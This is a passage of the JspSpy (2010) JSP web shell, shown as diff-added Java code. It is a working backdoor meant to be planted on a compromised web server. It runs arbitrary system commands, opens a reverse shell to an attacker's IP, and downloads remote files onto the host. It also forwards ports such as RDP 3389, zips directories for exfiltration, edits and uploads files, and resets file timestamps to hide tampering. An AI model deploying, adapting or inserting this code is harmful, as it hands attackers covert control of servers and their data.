"); +if (file instanceof EnterFile) +((EnterFile)file).close(); +} catch (ZipException e) { +JSession.setAttribute(MSG,"\""+JSession.getAttribute(ENTER).toString()+"\" Is Not a Zip File. Please Exit."); +throw e; +} catch (Exception e) { +JSession.setAttribute(MSG,"File Does Not Exist Or You Dont Have Privilege."+BACK_HREF); +throw e; +} +} +} +private static class LogoutInvoker extends DefaultInvoker { +public boolean doBefore() {return false;} +public boolean doAfter() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +Object dbo = JSession.getAttribute(DBO); +if (dbo != null) +((DBOperator)dbo).close(); +Object obj = JSession.getAttribute(PORT_MAP); +if (obj != null) { +ServerSocket s = (ServerSocket)obj; +s.close(); +} +Object online = JSession.getAttribute(SHELL_ONLINE); +if (online != null) +((OnLineProcess)online).stop(); +JSession.invalidate(); +((Invoker)ins.get("vLogin")).invoke(request,response,JSession); +} catch (ClassCastException e) { +JSession.invalidate(); +((Invoker)ins.get("vLogin")).invoke(request,response,JSession); +} catch (Exception e) { + +throw e ; +} +} +} +private static class UploadInvoker extends DefaultInvoker { +public boolean doBefore() {return false;} +public boolean doAfter() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +UploadBean fileBean = new UploadBean(); +response.getWriter().println(JSession.getAttribute(CURRENT_DIR).toString()); +fileBean.setSavePath(JSession.getAttribute(CURRENT_DIR).toString()); +fileBean.parseRequest(request); +File f = new File(JSession.getAttribute(CURRENT_DIR)+"/"+fileBean.getFileName()); +if (f.exists() && f.length() > 0) +JSession.setAttribute(MSG,"Upload File Success!"); +else +JSession.setAttribute("MSG","Upload File Failed!"); +response.sendRedirect(SHELL_NAME); +} catch (Exception e) { +throw e ; +} +} +} +private static class CopyInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String src = request.getParameter("src"); +String to = request.getParameter("to"); +InputStream in = null; +Object enter = JSession.getAttribute(ENTER); +if (enter == null) +in = new FileInputStream(new File(src)); +else { +ZipFile zf = new ZipFile((String)enter); +ZipEntry entry = zf.getEntry(src); +in = zf.getInputStream(entry); +} +BufferedInputStream input = new BufferedInputStream(in); +BufferedOutputStream output = new BufferedOutputStream(new FileOutputStream(new File(to))); +byte[] d = new byte[1024]; +int len = input.read(d); +while(len != -1) { +output.write(d,0,len); +len = input.read(d); +} +output.close(); +input.close(); +JSession.setAttribute(MSG,"Copy File Success!"); +response.sendRedirect(SHELL_NAME); +} catch (Exception e) { + +throw e ; +} +} +} +private static class BottomInvoker extends DefaultInvoker { +public boolean doBefore() {return false;} +public boolean doAfter() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +response.getWriter().println("
Copyright (C) 2010 http://www.Forjj.com/  [T00ls.Net] All Rights Reserved."+ +"
"); +} catch (Exception e) { + +throw e ; +} +} +} +private static class VCreateFileInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String path = request.getParameter("filepath"); +File f = new File(path); +if (!f.isAbsolute()) { +String oldPath = path; +path = JSession.getAttribute(CURRENT_DIR).toString(); +if (!path.endsWith("/")) +path+="/"; +path+=oldPath; +f = new File(path); +f.createNewFile(); +} else { +f.createNewFile(); +} +out.println("
"+ +"
"+ +"

Create / Edit File »

"+ +""+ +"

Current File (import new file name and new file)
"+ +"

"+ +"

File Content

"+ +"

"+ +"
"+ +"
"); +} catch (Exception e) { + +throw e ; +} +} +} +private static class VEditInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String path = request.getParameter("filepath"); +String charset = request.getParameter("charset"); +Object enter = JSession.getAttribute(ENTER); +InputStream input = null; +if (enter != null) { +ZipFile zf = new ZipFile((String)enter); +ZipEntry entry = new ZipEntry(path); +input = zf.getInputStream(entry); +} else { +File f = new File(path); +if (!f.exists()) +return; +input = new FileInputStream(path); +} + +BufferedReader reader = null; +if (Util.isEmpty(charset) || charset.equals("ANSI")) +reader = new BufferedReader(new InputStreamReader(input)); +else +reader = new BufferedReader(new InputStreamReader(input,charset)); +StringBuffer content = new StringBuffer(); +String s = reader.readLine(); +while (s != null) { +content.append(s+"\r\n"); +s = reader.readLine(); +} +reader.close(); +out.println("
"+ +"
"+ +"

Create / Edit File »

"+ +""+ +"

Current File (import new file name and new file)
"+ +"

"+ +"

File Content

"+ +"

"); +if (enter != null) +out.println(""); +else +out.println(""); +out.println("

"+ +"
"+ +"
"); + +} catch (Exception e) { + +throw e ; +} +} +} +private static class CreateFileInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String path = request.getParameter("filepath"); +String content = request.getParameter("filecontent"); +String charset = request.getParameter("charset"); +BufferedWriter outs = null; +if (charset.equals("ANSI")) +outs = new BufferedWriter(new FileWriter(new File(path))); +else +outs = new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(path)),charset)); +outs.write(content,0,content.length()); +outs.close(); +JSession.setAttribute(MSG,"Save File "+(new File(path)).getName()+" With "+charset+" Success!"); +response.sendRedirect(SHELL_NAME); +} catch (Exception e) { + +throw e ; +} +} +} +private static class VEditPropertyInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String filepath = request.getParameter("filepath"); +File f = new File(filepath); +if (!f.exists()) +return; +String read = f.canRead() ? "checked=\"checked\"" : ""; +String write = f.canWrite() ? "checked=\"checked\"" : ""; +Calendar cal = Calendar.getInstance(); +cal.setTimeInMillis(f.lastModified()); + +out.println("
"+ +"
"+ +"

Set File Property »

"+ +"

Current File (FullPath)

"+ +" "+ +"

"+ +" Read "+ +" Write "+ +"

"+ +"

Instead »"+ +"year:"+ +""+ +"month:"+ +""+ +"day:"+ +""+ +""+ +"hour:"+ +""+ +"minute:"+ +""+ +"second:"+ +""+ +"

"+ +"

"+ +"
"+ +"
"); +} catch (Exception e) { +throw e ; +} +} +} +private static class EditPropertyInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String f = request.getParameter("file"); +File file = new File(f); +if (!file.exists()) +return; + +String year = request.getParameter("year"); +String month = request.getParameter("month"); +String date = request.getParameter("date"); +String hour = request.getParameter("hour"); +String minute = request.getParameter("minute"); +String second = request.getParameter("second"); + +Calendar cal = Calendar.getInstance(); +cal.set(Calendar.YEAR,Integer.parseInt(year)); +cal.set(Calendar.MONTH,Integer.parseInt(month)-1); +cal.set(Calendar.DATE,Integer.parseInt(date)); +cal.set(Calendar.HOUR,Integer.parseInt(hour)); +cal.set(Calendar.MINUTE,Integer.parseInt(minute)); +cal.set(Calendar.SECOND,Integer.parseInt(second)); +if(file.setLastModified(cal.getTimeInMillis())){ +JSession.setAttribute(MSG,"Reset File Property Success!"); +} else { +JSession.setAttribute(MSG,"Reset File Property Failed!"); +} +response.sendRedirect(SHELL_NAME); +} catch (Exception e) { + +throw e ; +} +} +} +//VShell +private static class VsInvoker extends DefaultInvoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String cmd = request.getParameter("command"); +String program = request.getParameter("program"); +if (cmd == null) { +if (ISLINUX) +cmd = "id"; +else +cmd = "cmd.exe /c set"; +} +if (program == null) +program = "cmd.exe /c net start > "+SHELL_DIR+"/Log.txt"; +if (JSession.getAttribute(MSG)!=null) { +Util.outMsg(out,JSession.getAttribute(MSG).toString()); +JSession.removeAttribute(MSG); +} +out.println(""+ +"
"+ +"
"+ +"

Execute Program »

"+ +"

"+ +""+ +""+ +"Parameter
"+ +""+ +"

"+ +"
"+ +"
"+ +"

Execute Shell »

"+ +"

"+ +""+ +""+ +"Parameter
"+ +""+ +"

"+ +"
"+ +"
"); +} catch (Exception e) { + +throw e ; +} +} +} +private static class ShellInvoker extends DefaultInvoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String type = request.getParameter("type"); +if (type.equals("command")) { +((Invoker)ins.get("vs")).invoke(request,response,JSession); +out.println("
"); +out.println("
");
+String command = request.getParameter("command");
+if (!Util.isEmpty(command)) {
+Process pro = Runtime.getRuntime().exec(command);
+BufferedReader reader = new BufferedReader(new InputStreamReader(pro.getInputStream()));
+String s = reader.readLine();
+while (s != null) {
+out.println(Util.htmlEncode(Util.getStr(s)));
+s = reader.readLine();
+}
+reader.close();
+reader = new BufferedReader(new InputStreamReader(pro.getErrorStream()));
+s = reader.readLine();
+while (s != null) {
+out.println(Util.htmlEncode(Util.getStr(s)));
+s = reader.readLine();
+}
+reader.close();
+out.println("
"); +} +} else { +String program = request.getParameter("program"); +if (!Util.isEmpty(program)) { +Process pro = Runtime.getRuntime().exec(program); +JSession.setAttribute(MSG,"Program Has Run Success!"); +((Invoker)ins.get("vs")).invoke(request,response,JSession); +} +} +} catch (Exception e) { + +throw e ; +} +} +} +private static class DownInvoker extends DefaultInvoker{ +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String path = request.getParameter("path"); +if (Util.isEmpty(path)) +return; +InputStream i = null; +Object enter = JSession.getAttribute(ENTER); +String fileName = null; +if (enter == null) { +File f = new File(path); +if (!f.exists()) +return; +fileName = f.getName(); +i = new FileInputStream(f); +} else { +ZipFile zf = new ZipFile((String)enter); +ZipEntry entry = new ZipEntry(path); +fileName = entry.getName().substring(entry.getName().lastIndexOf("/") + 1); +i = zf.getInputStream(entry); +} +response.setHeader("Content-Disposition","attachment;filename="+URLEncoder.encode(fileName,PAGE_CHARSET)); +BufferedInputStream input = new BufferedInputStream(i); +BufferedOutputStream output = new BufferedOutputStream(response.getOutputStream()); +byte[] data = new byte[1024]; +int len = input.read(data); +while (len != -1) { +output.write(data,0,len); +len = input.read(data); +} +input.close(); +output.close(); +} catch (Exception e) { + +throw e ; +} +} +} +//VDown +private static class VdInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String savepath = request.getParameter("savepath"); +String url = request.getParameter("url"); +if (Util.isEmpty(url)) +url = "http://www.forjj.com/"; +if (Util.isEmpty(savepath)) { +savepath = JSession.getAttribute(CURRENT_DIR).toString(); +} +if (!Util.isEmpty(JSession.getAttribute("done"))) { +Util.outMsg(out,"Download Remote File Success!"); +JSession.removeAttribute("done"); +} +out.println("
"+ +"
"+ +"

Remote File DownLoad »

"+ +"

"+ +""+ +"

File   URL: "+ +"

"+ +"

Save Path: "+ +"

"+ +""+ +"

"+ +"
"); +} catch (Exception e) { + +throw e ; +} +} +} +private static class DownRemoteInvoker extends DefaultInvoker { +public boolean doBefore(){return true;} +public boolean doAfter(){return true;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String downFileUrl = request.getParameter("url"); +String savePath = request.getParameter("savepath"); +if (Util.isEmpty(downFileUrl) || Util.isEmpty(savePath)) +return; +URL downUrl = new URL(downFileUrl); +URLConnection conn = downUrl.openConnection(); + +File tempF = new File(savePath); +File saveF = tempF; +if (tempF.isDirectory()) { +String fName = downFileUrl.substring(downFileUrl.lastIndexOf("/")+1); +saveF = new File(tempF,fName); +} +BufferedInputStream in = new BufferedInputStream(conn.getInputStream()); +BufferedOutputStream out = new BufferedOutputStream(new FileOutputStream(saveF)); +byte[] data = new byte[1024]; +int len = in.read(data); +while (len != -1) { +out.write(data,0,len); +len = in.read(data); +} +in.close(); +out.close(); +JSession.setAttribute("done","d"); +((Invoker)ins.get("vd")).invoke(request,response,JSession); +} catch (Exception e) { + +throw e ; +} +} +} +private static class IndexInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +((Invoker)ins.get("filelist")).invoke(request,response,JSession); +} catch (Exception e) { + +throw e ; +} +} +} +private static class MkDirInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String name = request.getParameter("name"); +File f = new File(name); +if (!f.isAbsolute()) { +String path = JSession.getAttribute(CURRENT_DIR).toString(); +if (!path.endsWith("/")) +path += "/"; +path += name; +f = new File(path); +} +f.mkdirs(); +JSession.setAttribute(MSG,"Make Directory Success!"); +response.sendRedirect(SHELL_NAME); +} catch (Exception e) { + +throw e ; +} +} +} +private static class MoveInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String src = request.getParameter("src"); +String target = request.getParameter("to"); +if (!Util.isEmpty(target) && !Util.isEmpty(src)) { +File file = new File(src); +if(file.renameTo(new File(target))) { +JSession.setAttribute(MSG,"Move File Success!"); +} else { +String msg = "Move File Failed!"; +if (file.isDirectory()) { +msg += "The Move Will Failed When The Directory Is Not Empty."; +} +JSession.setAttribute(MSG,msg); +} +response.sendRedirect(SHELL_NAME); +} +} catch (Exception e) { + +throw e ; +} +} +} +private static class RemoveDirInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String dir = request.getParameter("dir"); +File file = new File(dir); +if (file.exists()) { +deleteFile(file); +deleteDir(file); +} + +JSession.setAttribute(MSG,"Remove Directory Success!"); +response.sendRedirect(SHELL_NAME); +} catch (Exception e) { + +throw e ; +} +} +public void deleteFile(File f) { +if (f.isFile()) { +f.delete(); +}else { +File[] list = f.listFiles(); +for (int i = 0;i"+ +""+ +""+ +""+ +" "+ +" "+ +" "+ +"

Pack Configuration >>

"+ +"
"+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
"+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
Packed Dir
Save To
Ext Filter"+ +" no Blacklist Whitelist"+ +"
"+ +"
Filesize Filter(KB) "+ +" no greaterthanlessthan
Exclude Dir
"+ +" "+ +"
"+ +"
" +); +} catch (Exception e) { + +throw e; +} +} +} +private static class PackInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +private boolean config = false; +private String extFilter = "blacklist"; +private String[] fileExts = null; +private String sizeFilter = "no"; +private int filesize = 0; +private String[] exclude = null; +private String packFile = null; +private void reset(){ +this.config = false; +this.extFilter = "blacklist"; +this.fileExts = null; +this.sizeFilter = "no"; +this.filesize = 0; +this.exclude = null; +this.packFile = null; +} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String config = request.getParameter("config"); +if (!Util.isEmpty(config) && config.equals("true")) { +this.config = true; +this.extFilter = request.getParameter("extfilter"); +this.fileExts = request.getParameter("fileext").split(","); +this.sizeFilter = request.getParameter("sizefilter"); +this.filesize = Integer.parseInt(request.getParameter("filesize")); +this.exclude = request.getParameter("exclude").split(","); +} +String packedFile = request.getParameter("packedfile"); +if (Util.isEmpty(packedFile)) +return; +this.packFile = packedFile; +String saveFileName = request.getParameter("savefilename"); +File saveF = null; +if (this.config) +saveF = new File(saveFileName); +else +saveF = new File(JSession.getAttribute(CURRENT_DIR).toString(),saveFileName); +if (saveF.exists()) { +JSession.setAttribute(MSG,"The File \""+saveFileName+"\" Has Been Exists!"); +response.sendRedirect(SHELL_NAME); +return; +} +File pF = new File(packedFile); +ZipOutputStream zout = null; +String base = ""; +if (pF.isDirectory()) { +if (pF.listFiles().length == 0) { +JSession.setAttribute(MSG,"No File To Pack ! Maybe The Directory Is Empty ."); +response.sendRedirect(SHELL_NAME); +this.reset(); +return; +} +zout = new ZipOutputStream(new BufferedOutputStream(new FileOutputStream(saveF))); +zipDir(pF,base,zout); +} else { +zout = new ZipOutputStream(new BufferedOutputStream(new FileOutputStream(saveF))); +zipFile(pF,base,zout); +} +zout.close(); +this.reset(); +JSession.setAttribute(MSG,"Pack File Success!"); +response.sendRedirect(SHELL_NAME); +} catch (Exception e) { +throw e; +} +} +public void zipDir(File f,String base,ZipOutputStream zout) throws Exception { +if (f.isDirectory()) { +if (this.config) { +String curName = f.getAbsolutePath().replace('\\','/'); +curName = curName.replaceAll("\\Q"+this.packFile+"\\E",""); +if (this.exclude != null) { +for (int i = 0;i filesize) +return; +} +} +} +ZipEntry entry = new ZipEntry(base+f.getName()); +zout.putNextEntry(entry); +FileInputStream fInput = new FileInputStream(f); +int len = 0; +byte[] buf = new byte[1024]; +while ((len = fInput.read(buf)) != -1) { +zout.write(buf, 0, len); +zout.flush(); +} +fInput.close(); +} +} +private static class UnPackInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String savepath = request.getParameter("savepath"); +String zipfile = request.getParameter("zipfile"); +if (Util.isEmpty(savepath) || Util.isEmpty(zipfile)) +return; +File save = new File(savepath); +save.mkdirs(); +ZipFile file = new ZipFile(new File(zipfile)); +Enumeration e = file.entries(); +while (e.hasMoreElements()) { +ZipEntry en = (ZipEntry) e.nextElement(); +String entryPath = en.getName(); +int index = entryPath.lastIndexOf("/"); +if (index != -1) +entryPath = entryPath.substring(0,index); +File absEntryFile = new File(save,entryPath); +if (!absEntryFile.exists() && (en.isDirectory() || en.getName().indexOf("/") != -1)) +absEntryFile.mkdirs(); +BufferedOutputStream output = null; +BufferedInputStream input = null; +try { +output = new BufferedOutputStream( +new FileOutputStream(new File(save,en.getName()))); +input = new BufferedInputStream( +file.getInputStream(en)); +byte[] b = new byte[1024]; +int len = input.read(b); +while (len != -1) { +output.write(b, 0, len); +len = input.read(b); +} +} catch (Exception ex) { +} finally { +try { +if (output != null) +output.close(); +if (input != null) +input.close(); +} catch (Exception ex1) { +} +} +} +file.close(); +JSession.setAttribute(MSG,"UnPack File Success!"); +response.sendRedirect(SHELL_NAME); +} catch (Exception e) { + +throw e ; +} +} +} +//VMapPort +private static class VmpInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +Object localIP = JSession.getAttribute("localIP"); +Object localPort = JSession.getAttribute("localPort"); +Object remoteIP = JSession.getAttribute("remoteIP"); +Object remotePort = JSession.getAttribute("remotePort"); +Object done = JSession.getAttribute("done"); + +JSession.removeAttribute("localIP"); +JSession.removeAttribute("localPort"); +JSession.removeAttribute("remoteIP"); +JSession.removeAttribute("remotePort"); +JSession.removeAttribute("done"); + +if (Util.isEmpty(localIP)) +localIP = InetAddress.getLocalHost().getHostAddress(); +if (Util.isEmpty(localPort)) +localPort = "3389"; +if (Util.isEmpty(remoteIP)) +remoteIP = "www.forjj.com"; +if (Util.isEmpty(remotePort)) +remotePort = "80"; +if (!Util.isEmpty(done)) +Util.outMsg(out,done.toString()); + +out.println("
"+ +""+ +" "+ +" "+ +" "+ +""+ +"

PortMap >>

"+ +"
"+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +"

Local Ip :"+ +" "+ +" 		Local Port :"+ +" Remote Ip :"+ +" Remote Port :"+ +"

"+ +" "+ +" "+ +"
"+ +"
"+ +"
"+ +"
"); +String targetIP = request.getParameter("targetIP"); +String targetPort = request.getParameter("targetPort"); +String yourIP = request.getParameter("yourIP"); +String yourPort = request.getParameter("yourPort"); +if (Util.isEmpty(targetIP)) +targetIP = "127.0.0.1"; +if (Util.isEmpty(targetPort)) +targetPort = "3389"; +if (Util.isEmpty(yourIP)) +yourIP = request.getRemoteAddr(); +if (Util.isEmpty(yourPort)) +yourPort = "53"; +out.println("
"+ +""+ +" "+ +" "+ +" "+ +""+ +"

Port Back >>

"+ +"
"+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +"

Target Ip :"+ +" "+ +" 		Target Port :"+ +" Your Ip :"+ +" Your Port :"+ +"

"+ +" "+ +"
"+ +"
"+ +"
"+ +"
"); +} catch (Exception e) { + +throw e ; +} +} +} +//StopMapPort +private static class SmpInvoker extends DefaultInvoker { +public boolean doAfter(){return true;} +public boolean doBefore(){return true;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +Object obj = JSession.getAttribute(PORT_MAP); +if (obj != null) { +ServerSocket server = (ServerSocket)JSession.getAttribute(PORT_MAP); +server.close(); +} +JSession.setAttribute("done","Stop Success!"); +((Invoker)ins.get("vmp")).invoke(request,response,JSession); +} catch (Exception e) { + +throw e ; +} +} +} +//PortBack +private static class PortBackInvoker extends DefaultInvoker { +public boolean doAfter(){return true;} +public boolean doBefore(){return true;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String targetIP = request.getParameter("targetIP"); +String targetPort = request.getParameter("targetPort"); +String yourIP = request.getParameter("yourIP"); +String yourPort = request.getParameter("yourPort"); +Socket yourS = new Socket(); +yourS.connect(new InetSocketAddress(yourIP,Integer.parseInt(yourPort))); +Socket targetS = new Socket(); +targetS.connect(new InetSocketAddress(targetIP,Integer.parseInt(targetPort))); +StreamConnector.readFromLocal(new DataInputStream(targetS.getInputStream()),new DataOutputStream(yourS.getOutputStream())); +StreamConnector.readFromRemote(targetS,yourS,new DataInputStream(yourS.getInputStream()),new DataOutputStream(targetS.getOutputStream())); +JSession.setAttribute("done","Port Back Success !"); +((Invoker)ins.get("vmp")).invoke(request,response,JSession); +} catch (Exception e) { + +throw e ; +} +} +} +private static class MapPortInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String localIP = request.getParameter("localIP"); +String localPort = request.getParameter("localPort"); +final String remoteIP = request.getParameter("remoteIP"); +final String remotePort = request.getParameter("remotePort"); +if (Util.isEmpty(localIP) || Util.isEmpty(localPort) || Util.isEmpty(remoteIP) || Util.isEmpty(remotePort)) +return; +Object obj = JSession.getAttribute(PORT_MAP); +if (obj != null) { +ServerSocket s = (ServerSocket)obj; +s.close(); +} +final ServerSocket server = new ServerSocket(); +server.bind(new InetSocketAddress(localIP,Integer.parseInt(localPort))); +JSession.setAttribute(PORT_MAP,server); +new Thread(new Runnable(){ +public void run(){ +while (true) { +Socket soc = null; +Socket remoteSoc = null; +DataInputStream remoteIn = null; +DataOutputStream remoteOut = null; +DataInputStream localIn = null; +DataOutputStream localOut = null; +try{ +soc = server.accept(); +remoteSoc = new Socket(); +remoteSoc.connect(new InetSocketAddress(remoteIP,Integer.parseInt(remotePort))); +remoteIn = new DataInputStream(remoteSoc.getInputStream()); +remoteOut = new DataOutputStream(remoteSoc.getOutputStream()); +localIn = new DataInputStream(soc.getInputStream()); +localOut = new DataOutputStream(soc.getOutputStream()); +StreamConnector.readFromLocal(localIn,remoteOut); +StreamConnector.readFromRemote(soc,remoteSoc,remoteIn,localOut); +}catch(Exception ex) +{ +break; +} +} +} + +}).start(); +JSession.setAttribute("done","Map Port Success!"); +JSession.setAttribute("localIP",localIP); +JSession.setAttribute("localPort",localPort); +JSession.setAttribute("remoteIP",remoteIP); +JSession.setAttribute("remotePort",remotePort); +JSession.setAttribute(SESSION_O,"vmp"); +response.sendRedirect(SHELL_NAME); +} catch (Exception e) { + +throw e ; +} +} +} +//VBackConnect +private static class VbcInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +Object ip = JSession.getAttribute("ip"); +Object port = JSession.getAttribute("port"); +Object program = JSession.getAttribute("program"); +Object done = JSession.getAttribute("done"); +JSession.removeAttribute("ip"); +JSession.removeAttribute("port"); +JSession.removeAttribute("program"); +JSession.removeAttribute("done"); +if (Util.isEmpty(ip)) +ip = request.getRemoteAddr(); +if (Util.isEmpty(port) || !Util.isInteger(port.toString())) +port = "53"; +if (Util.isEmpty(program)) { +if (ISLINUX) +program = "/bin/bash"; +else +program = "cmd.exe"; +} + +if (!Util.isEmpty(done)) +Util.outMsg(out,done.toString()); +out.println("
"+ +""+ +" "+ +" "+ +" "+ +""+ +"

Back Connect >>

"+ +"
"+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
Your Ip :"+ +" "+ +" Your Port :"+ +" Program To Back :"+ +"

"+ +" "+ +"
"+ +"
"+ +"
"+ +"
"); +} catch (Exception e) { + +throw e ; +} +} +} +private static class BackConnectInvoker extends DefaultInvoker { +public boolean doAfter(){return false;} +public boolean doBefore(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String ip = request.getParameter("ip"); +String port = request.getParameter("port"); +String program = request.getParameter("program"); +if (Util.isEmpty(ip) || Util.isEmpty(program) || !Util.isInteger(port)) +return; +Socket socket = new Socket(ip,Integer.parseInt(port)); +Process process = Runtime.getRuntime().exec(program); +(new StreamConnector(process.getInputStream(), socket.getOutputStream())).start(); +(new StreamConnector(process.getErrorStream(), socket.getOutputStream())).start(); +(new StreamConnector(socket.getInputStream(), process.getOutputStream())).start(); +JSession.setAttribute("done","Back Connect Success!"); +JSession.setAttribute("ip",ip); +JSession.setAttribute("port",port); +JSession.setAttribute("program",program); +JSession.setAttribute(SESSION_O,"vbc"); +response.sendRedirect(SHELL_NAME); +} catch (Exception e) { + +throw e ; +} +} +} +private static class JspEnvInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""+ +" "+ +" "+ +" "+ +"

System Properties >>

"+ +"
"+ +"
"+ +"
    "); +Properties pro = System.getProperties(); +Enumeration names = pro.propertyNames(); +while (names.hasMoreElements()){ +String name = (String)names.nextElement(); +out.println("
  • "+Util.htmlEncode(name)+" : "+Util.htmlEncode(pro.getProperty(name))+"
    • "); +} +out.println("

System Environment >>

    "); +/* + Map envs = System.getenv(); +Set> entrySet = envs.entrySet(); +for (Map.Entry en:entrySet) { +out.println("
  • "+Util.htmlEncode(en.getKey())+" : "+Util.htmlEncode(en.getValue())+"
    • "); +}*/ +out.println("
"); +} catch (Exception e) { + +throw e ; +} +} +} +private static class ReflectInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String c = request.getParameter("Class"); +Class cls = null; +try { +if (!Util.isEmpty(c)) +cls = Class.forName(c); +} catch (ClassNotFoundException ex) { +Util.outMsg(out,"Class "+c+" Not Found ! "); +} +out.println("
"+ +" "+ +" "+ +" "+ +" "+ +" "+ +"

Java Reflect >>

"+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
Class Name : "+ +"
"+ +"
"+ +"
"); + +if (cls != null) { +StringBuffer sb = new StringBuffer(); +if (cls.getPackage() != null) +sb.append("package "+cls.getPackage().getName()+";\n"); +String n = null; +if (cls.isInterface()) +n = ""; +//else if (cls.isEnum()) +// n = "enum"; +else +n = "class"; +sb.append(Modifier.toString(cls.getModifiers())+" "+n+" "+cls.getName()+"\n"); +if (cls.getSuperclass() != null) +sb.append("\textends "+cls.getSuperclass().getName()+"\n"); +if (cls.getInterfaces() != null && cls.getInterfaces().length != 0) { +Class[] faces = cls.getInterfaces(); +sb.append("\t implements "); +for (int i = 0;i"+faces[i].getName()+""); +if (i != faces.length -1) { +sb.append(","); +} +} +} +sb.append("{\n\t\n"); +sb.append("\t//constructors..\n"); +Constructor[] cs = cls.getConstructors(); +for (int i = 0;i"); +if (obj != null) +sb.append(obj.toString()); +else +sb.append("NULL"); + +sb.append(""); +} +sb.append("\n"); +} + +sb.append("\n\t//methods\n"); +Method[] ms = cls.getDeclaredMethods(); +for (int i =0;i")+""; +Util.outMsg(out,m,"left"); +} +} catch (Exception e) { +throw e; +} +} +} +private static class TopInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println("
"+ +""+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
JspSpy Ver: 2010 "+request.getHeader("host")+" ("+InetAddress.getLocalHost().getHostAddress()+") | copy
Logout | "+ +" File Manager | "+ +" DataBase Manager | "+ +" Execute Command | "+ +" Shell OnLine | "+ +" Back Connect | "+ +" Java Reflect | "+ +" "+ +" Eval Java Code | "+ +" Port Scan | "+ +" Download Remote File | "+ +" ClipBoard | "+ +" Port Map | "+ +" Others | "+ +" JSP Env "+ +"
